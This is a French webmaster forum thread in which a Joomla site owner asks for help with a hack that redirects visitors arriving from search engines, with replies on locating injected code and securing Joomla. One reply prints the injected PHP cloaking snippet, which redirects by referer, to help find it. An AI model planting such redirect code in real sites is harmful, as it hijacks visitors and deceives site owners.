Jump to content

Recommended Posts

Bonjour,

Mon site internet créé sur Joomla a été piraté mais je ne trouve pas ou est le code malveillant.

Mon site est http://www.quermaurelle.com

Lorsque l'on accède directement au site par l'url tout fonctionne bien, mais lorsque l'on passe par les moteurs de recherche il y a une redirection.

Est ce que quelqu'un pourrait m'aider ou me donner le nom d'une entreprise qui pourrait le faire.

Merci de vos réponses.

Link to post
Share on other sites

Bonjour,

Tu as eu une injection du code qui fait la redirection. Il faut que tu regardes dans tes templates, fichiers et repertoires qui sont accessibles en ecritures (777), base de données, ...

Le problème c'est que ce type de code est souvent crypté donc il est impossible de trouver une chaine de caractere (par exemple l'url destination).

Commence par le template... il y a p-e un code JS quelque part dans le template.

Link to post
Share on other sites

recherche un code dans tes scripts qui ressemble à ça :

error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: [l'adresse du site de destination que je ne mentionne pas exprès]"); exit(); } } } }

Il y'a un "cloaking", seuls les moteurs de recherche voient la redirection, c'est ce qui empêche la détection du problème !!

Link to post
Share on other sites

Et on peut regarder les dates des dernières modifications des fichiers. S'il y a un fichier modifié très récemment, il est probablement incriminé.

Link to post
Share on other sites
  • 3 weeks later...

Bonjour,

je viens de me faire hacker le serveur

je pense que l'attaque venait par les sites joomla

Dan a remis mon serveur à plat, merci Dan, merci Arlette,

voici les infos trouvées suite à ma mésaventure.

je voudrais mettre en garde ceux à qui ca pourrait arriver


/>http://www.tux-planet.fr/faille-de-securite-dans-joomla-15x-remote-admin-password-change/

URGENT!! mettre à jour vos sites joomla en 2.5

je viens de tester sur le site le quermaurelle, la faille est présente, un formulaire apparait (je n'ai pas été plus loin)

autre info trouvée, concernant DirectAdmin,

voici les erreurs (de débutant que j'ai faites) à ne pas commettre:
/>http://www.edelweisshosting.net/index.php?topic=4380.0

;) à part pour les skins (suis pas féru des skins)

et pour "sécuriser" autant que faire se peut... un site Joomla

voici quelques conseils simples et concis à respecter
/>http://www.revue-hebergement-web.com/tutoriel/joomla/securiser-joomla.php
/>http://www.support-joomla.com/administration/securite

et en dernier recours, y'a aussi ça:
/>http://www.shantee.net/comment-changer-le-nom-du-repertoire-qadministratorq-pour-plus-de-securite-avec-joomla.html

*edit

je réinstalle mes sites (mis à jour) petit à petit,

je m'inquiète de savoir si dans mes sources joomla

je n'ai pas embarqué une infection, certains sites étant des upgrades d'upgrade

et je conseille ce post: http://forum.ovh.com/showthread.php?t=49433

qui traite des infections par iframe et

pour sécuriser encore plus un site joomla ou autre CMS d'ailleurs.

Bonjour,

Mon site internet créé sur Joomla a été piraté mais je ne trouve pas ou est le code malveillant.

Mon site est http://www.quermaurelle.com

Lorsque l'on accède directement au site par l'url tout fonctionne bien, mais lorsque l'on passe par les moteurs de recherche il y a une redirection.

Est ce que quelqu'un pourrait m'aider ou me donner le nom d'une entreprise qui pourrait le faire.

Merci de vos réponses.

Edited by Lutin Jaune
Link to post
Share on other sites

autre info trouvée, concernant DirectAdmin,

voici les erreurs (de débutant que j'ai faites) à ne pas commettre:
/>http://www.edelweisshosting.net/index.php?topic=4380.0

;) à part pour les skins (suis pas féru des skins)

Leur conseil pour l'utilisation du skin "anglais" est correct, sauf si, comme dans le cas des serveurs que j'installe, une traduction française A JOUR est disponible (ou du moins a été développée et tenue à jour) ;)

Toutes les fonctionnalités sont donc accessibles, même avec le skin en langue française.

Link to post
Share on other sites

je ne disais pas que l'histoire du skins était fausse,

je disais juste que j'avais pas commis cette erreur

puisque j'utilise toujours des skins garantis d'origine.

(3 erreurs sur 4 c'était déjà pas mal)

Merci Dan,

Leur conseil pour l'utilisation du skin "anglais" est correct, sauf si, comme dans le cas des serveurs que j'installe, une traduction française A JOUR est disponible (ou du moins a été développée et tenue à jour) ;)

Toutes les fonctionnalités sont donc accessibles, même avec le skin en langue française.

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Similar Content

    • By cyberdede
      Bonjour à tous

      je voudrais quand je tape https;//monsite/dossier accéder à https;//monsite/dossier/index.php
      or j'accède à https;//monsite/dossier/ avec un 404

      en localhost ca fonctionne

      pour la racine https;//monsite c'est ok

      mon htaccess
       
      RewriteEngine On Options -Indexes RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^([^\.]+)$ $1.php [NC,L] RewriteCond %{HTTPS} ^off$ [NC] RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L] AddDefaultCharset UTF-8 ErrorDocument 404 /404.php  
    • By kevinjoseph
      Bonjour, j’ai un gros problème sur mon site Wordpress . Du jour au lendemain, mon site wordpress fais une redirection vers un autre site wordpress que j’ai crée ,sans que je touche à quoi que ce soit. Quand j’essai d’aller sur l’admin pour désactiver les plugins et voir d’où peut venir le problème. Impossible d’accéder, sa me redirige vers l’admin de l’autre site. Au final il est impossible que j’accède au site via (google, la bare de recherche, les favoris, l’admin…) pour voir ce qu’il fonction pas, j’ai juste accès au FTP. J'ai essayé de voir d'où pouvez venir ce bug en supprimant les plugins, le théme, mes derniers modifications, regarder sur le .htaccess si il y avais quelque par le nom de domaine de l'autre site écrit. Ca n'a rien changer, le site continue de ce rediriger automatiquement vers l'autre site. Si vous avez une idée d’où sa peut venir ou comment faire pour arranger ça et surtout comment éviter que sa ce reproduise. Sa m’aiderai beaucoup, merci d’avance.
      voici le code du .htaccess:
       
      # BEGIN WordPress
      <IfModule mod_rewrite.c>
      RewriteEngine On
      RewriteBase /
      RewriteRule ^index\.php$ - [L]
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule . /index.php [L]
      </IfModule>

      # END WordPress
      ~   Ludovic • 16:28    
    • By leobk
      Bonjour,
       
      J'ai un sous-domaine www.fr.monsite.com dédié pour la réservation des vols
      j'ai redirigé récemment ce sous-domaine vers le site principal www.monsite.com et le nombre des erreurs 404 a explosé
      un nombre énorme d'URLs de type :
      www.fr.monsite.com/fr/vols/index?f_type=01&f_departure=TLS&f_destination=DJE&f_date_from=08/09/2013&f_date_to=22/09/2013&f_flexibility=3&f_paxs_adults=2&f_paxs_childs=0&f_paxs_infants=0
      redirigent vers :
      www.monsite.com/fr/vols/index?f_type=01&f_departure=TLS&f_destination=DJE&f_date_from=08/09/2013&f_date_to=22/09/2013&f_flexibility=3&f_paxs_adults=2&f_paxs_childs=0&f_paxs_infants=0
       
      L'URL de destination est biensur introuvable 404, puisque les variables utilisés dans les deux sites ne sont pas identiques
      Voici la structure d'URL si on fait une recherche de vol sur le site principal :
      https://www.monsite.com/fr/resa?depart=SXF&arrivee=NBE&aller=2017-11-10&retour=2017-11-30&adultes=1&enfants=1&bebes=0&departureDateTime_D=&arrivalDateTime_D=&departureDateTime_R=&arrivalDateTime_R=&fareGroupName=&fareGroupName_R=&sens=2&currency=EUR&airline=&flightNumber=&flight=&flight_retour=&webview=0&felxibilite=2
       
       
      existe-il un moyen pour rediriger l'ensemble des URLs dynamiques du sous-domaines vers une URL statique du domaine principale (autre que l'accueil)?
       
       
    • By PieceMobile
      Bonjour,



      J'espère que vous allez tous bien.



      Auriez vous une solution pour rediriger ( via une règle htaccess par exemple ) :



      http://www.mon-site.com/blabla.html?ps_mobile_site=1



      vers : http://www.mon-site.com/blabla.html



      A mon avis, s'agissant d'un paramètre d'URL, de ce que j'ai cru comprendre -a mon petit niveau- c’était pas possible, mais ça me dépannerai pas mal si l'un d'entre vous avait une idée.



      Merci d'avance





×
×
  • Create New...